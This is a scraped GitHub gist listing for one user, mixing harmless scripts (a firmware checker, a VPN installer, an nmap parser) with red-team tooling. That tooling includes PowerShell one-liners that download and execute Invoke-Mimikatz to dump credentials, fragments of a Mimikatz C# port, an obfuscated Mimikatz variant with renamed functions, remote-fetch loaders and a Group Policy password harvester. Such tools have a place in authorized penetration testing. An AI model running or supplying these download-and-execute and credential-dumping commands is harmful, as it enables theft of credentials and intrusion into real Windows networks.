I hereby claim:
- I am dviros on github.
- I am dviros (https://keybase.io/dviros) on keybase.
- I have a public key ASDQvFG712lwO6HgXWaeFaK6GfIkquaFHx3g2XQZWd0vqwo
To claim this, I am signing this object:
Dviros
/ keybase.md
Created
March 20, 2017 08:29
Dviros
/ RedTeam_CheatSheet.ps1
Created
March 7, 2019 16:38
— forked from m8sec/RedTeam_CheatSheet.ps1
Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Invoke-Mimikatz: Dump credentials from memory | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
| # Run IronPython SafetyKatz code using the embedded IPY engine | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/m8r0wn/OffensiveDLR/master/Invoke-IronKatz.ps1');" | |
| # Import Mimikatz Module to run further commands | |
| powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')" | |
| # Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)] |
Dviros
/ script.ps1
Last active
March 8, 2019 12:41
Powershell FOTA Checker - Samsung Devices (Note8 SM-N950F)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ### Change the region and model by your need. | |
| ############################################## | |
| Add-Type -AssemblyName PresentationFramework | |
| [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 | |
| $region = "SIN" | |
| $model = "SM-N950F" | |
| $latestfirmware = "N950FXXS5CRK4/N950FOXM5CRHA/N950FXXU5CRK4" |
Dviros
/ katz.cs
Last active
March 11, 2019 17:02
— forked from pljoel/katz.cs
Updated Katz.cs - Mimikatz 2.1.1
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Text; | |
| using System.IO.Compression; | |
| using System.EnterpriseServices; | |
| using System.Collections.Generic; | |
| using System.Runtime.InteropServices; | |
| using System.Security.Cryptography; | |
| /* |
Dviros
/ Tralala.ps1
Last active
March 11, 2019 17:31
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-Kukuriku21112222 | |
| { | |
| [CmdletBinding(DefaultParameterSetName="Dupiduuuuu123")] | |
| Param( | |
| [Parameter(Position = 0)] | |
| [String[]] | |
| $ComputerName, | |
| [Parameter(ParameterSetName = "Dupiduuuuu123", Position = 1)] | |
| [Switch] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #### Mimikatz .Net v4 (2.1.1) | |
| #### Many thanks to Casey Smith, Ridter, pljoel | |
| ########################################################### | |
| $url = "https://gist.github.com/Ridter/397db5d672bd273e785f117715574319/raw/13966117e4ba13be5da0c4dc44ac9ebfd61fe22a/katz.cs" | |
| $NetFolder = "C:\Windows\Microsoft.NET\Framework64\v4.0.30319" | |
| $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQC1fii/8MpR5WWVlm8Kakos38ov4mWNnAo03veCOsKA+3GYGXErc+zo7MlCMr9U5Jx74CzxT9JC73xRwTOBr6qLk1o2UxwyqIJtG6eCH5OprcbaFitqtssE2Kpt2g9OrhQXWl5Kl8mIhyaEJket7xyeSv4i/+D95Crs+e8WkNd4vz/vUp+DdJITNg4emFMssabfRPmzvPPZPYhbwo17VjlMosx744WMWwjmgjdrLPORJtks1M8a8swS5Ztk2bBT1ekLCRGnJZpnn21EmJsC0O66LX1KNIYZB+GGQJUXSJzL0AqtCf8HxlR2m6dYlwFGI/uWSImt3J80EjXcEUWefZ/RR5id2a3TNk18jjZ1k5043iGNRXklBBQPqeAIN+BgRiRHkGZ74+DeAP5nF/kJF8qZFlWFkqcBBwlLrOedlbOMY0G/whw01ikB9gwyYqaapat1zzN3Z/PslVc4d2qCCPwoabWbiqhNyA/JTvcjhNI3cPOjgJ9EdBToawuMMdkQxp+LbXP3nn6U0uuLMilaT7YZx4wjp3Za79hntfetMGxzgOXdSgChnahletxNbK3w8LV56ZOrphX7WRdeMWAJhZODhbIVAufs2A3yGIOOZCQoqpXPIM6ZL8NH38Y6iVSrgibvduRjPFvhjfLLOHbz1l |
Dviros
/ Get-GPPPassword_multi_domain.ps1
Created
April 4, 2019 12:32
Quick and dirty AD query script, in use for multi AD environments. This script utilizes Powersploit's GPPPassword tool (Chris Campbell, obscuresec) to run.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Quick and dirty AD query script, in use for multi AD environments. | |
| # This script utilizes Powersploit's GPPPassword tool (Chris Campbell, obscuresec) to run. | |
| ############################################################################################################## | |
| $domains = ("Domain1”,”Domain2”) | |
| Import-Module PATH_TO_FILE\Get-GPPPassword.ps1 | |
| foreach ($domain in $domains){ | |
| Write-Host "Testing SMB Connectivity to" $domain |
Dviros
/ wireguard_pihole_install.sh
Created
April 29, 2019 19:49
— forked from sethenoka/wireguard_pihole_install.sh
A script for installing a Wireguard VPN with Pi-Hole (Unbound) recursive DNS
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # This file is designed to spin up a Wireguard VPN quickly and easily, | |
| # including configuring Pi-Hole as a recursive local DNS server using | |
| # Unbound to block ads a the DNS level | |
| # | |
| # Make sure to change the public/private keys before running the script | |
| # Also change the IPs, IP ranges, and listening port if desired | |
| # add wireguard repo | |
| sudo add-apt-repository ppa:wireguard/wireguard -y |
Dviros
/ nmap_parser.ps1
Last active
July 23, 2019 22:33
Simple and effective NMAP parser using PowerShell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $file = read-host "Full path for NMAP scan XML file, eg C:\nmap.xml" | |
| $xml = [xml](Get-Content $file) | |
| $Results = $Xml.nmaprun.host | | |
| ForEach-Object { | |
| $hash = [ordered]@{}; $hash.Address = $_.address.addr | |
| Foreach ($port in $_.ports.port) { | |
| $hash."$($port.service.name)" = $port.state.state | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #### Mimikatz .Net v2 (2.0.0 Alpha) | |
| #### Many thanks to Casey Smith, Ridter, pljoel | |
| ########################################################### | |
| $url = "https://gist.githubusercontent.com/Ridter/041e7ca21de39e285e151893edff4bd9/raw/aa59a8691cdad53cda9013c015b8b1a94eb868db/katz.cs" | |
| $NetFolder = "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\" | |
| $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b |
OlderNewer